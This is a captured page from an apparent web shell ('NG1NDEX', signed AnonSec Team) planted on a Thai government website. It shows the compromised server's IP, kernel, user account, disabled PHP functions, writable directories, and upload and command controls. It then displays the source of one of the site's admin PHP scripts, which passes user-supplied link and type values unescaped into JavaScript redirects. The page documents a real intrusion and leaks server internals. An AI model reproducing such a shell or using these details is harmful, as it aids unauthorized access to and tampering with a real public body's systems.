NG1NDEX
Server IP : 103.233.192.212  /  Your IP : 18.222.231.86
Web Server : Apache/2
System : Linux sv1.inde.co.th 3.10.0-1160.36.2.el7.x86_64 #1 SMP Wed Jul 21 11:57:15 UTC 2021 x86_64
User : sumpatuan ( 1058)
PHP Version : 5.5.38
Disable Function : symlink,shell_exec,exec,proc_close,proc_open,popen,system,dl,putenv,passthru,escapeshellarg,escapeshellcmd,pcntl_exec,proc_get_status,proc_nice,proc_terminate,pclose,ini_alter,virtual,openlog,ini_restore
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/sumpatuan/domains/sumpatuan.go.th/private_html/admin/sub/action/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/sumpatuan/domains/sumpatuan.go.th/private_html/admin/sub/action/save-subdatafile-adddata.php
<?php
require_once('session_backend_administrator.php');
header('Content-Type: text/html; charset=UTF-8');
date_default_timezone_set("Asia/Bangkok"); 
$datetime = date('d/m/Y H.i'); 

if($STT_login=="admin_login_true"){

    if( !isset($_POST['txt_name']) or !isset($_POST['txt_type']) or !isset($_POST['txt_subtype']) or !isset($_POST['txt_data']) ){
        echo "<SCRIPT type='text/javascript'>
                alert('กรุณากรอกข้อมูลให้ครบ');
                window.location.replace(document.referrer);
            </SCRIPT>";
        exit;
    }else{
        
        $data_namesubdatafile = trim($con_db_administrator->real_escape_string($_POST['txt_name']));
        $data_typesubdatafile = $con_db_administrator->real_escape_string($_POST['txt_type']);
        $data_subtypesubdatafile = $con_db_administrator->real_escape_string($_POST['txt_subtype']);
        $data_sttsubdatafile = $con_db_administrator->real_escape_string($_POST['statusshow']);
        $data_linksubdatafile = $con_db_administrator->real_escape_string($_POST['linksubdatafile']);
        $data_subdatafile = $con_db_administrator->real_escape_string($_POST['txt_data']);

        $date = $_POST['txt_date'];
        $lastupdate_subdatafile = date("d/m/Y",strtotime($date));
    
            /////// insert DATA to SQL

            $insert_subdatafile = " INSERT INTO `data_subdatafile` (`name_subdatafile`, `type_subdatafile`, `subtype_subdatafile`, `data_subdatafile`, `stt_subdatafile`, `lastupdate_subdatafile`) 
                                    VALUES ('$data_namesubdatafile', '$data_typesubdatafile', '$data_subtypesubdatafile', '$data_subdatafile', '$data_sttsubdatafile', '$lastupdate_subdatafile') ";      
            $action_subdatafile = $con_db_administrator->query($insert_subdatafile);
            if(!$action_subdatafile){
                echo "<SCRIPT type='text/javascript'>
                        alert('เพิ่มข้อมูลไม่สำเร็จ กรุณาลองใหม่อีกครั้ง');
                        window.location.replace('../$data_linksubdatafile');
                    </SCRIPT>";
                exit;
            }else{
                $sql_data = " SELECT `id_subdatafile` FROM `data_subdatafile` WHERE `name_subdatafile`='$data_namesubdatafile' AND `lastupdate_subdatafile`='$lastupdate_subdatafile' ORDER BY `id_subdatafile` DESC LIMIT 1 "; 
                $qr_data = mysqli_query($con_db_administrator, $sql_data); 
                $rs_data = mysqli_fetch_assoc($qr_data); 

                $id_data = $rs_data['id_subdatafile'];

                echo "<SCRIPT type='text/javascript'>
                        alert('เพิ่มข้อมูลใหม่ สำเร็จ');
                        window.location.replace('../subdatafile-edit?id=$id_data&type=$data_typesubdatafile&link=$data_linksubdatafile');
                    </SCRIPT>";
                exit;
            }
            
    }

}else{
    echo "<SCRIPT type='text/javascript'>
        alert('กรุณาเข้าสู่ระบบ');
        window.location.replace('../../index');
    </SCRIPT>";
    exit;
}
mysqli_close($con_db_administrator);
?>

Anon7 - 2022
AnonSec Team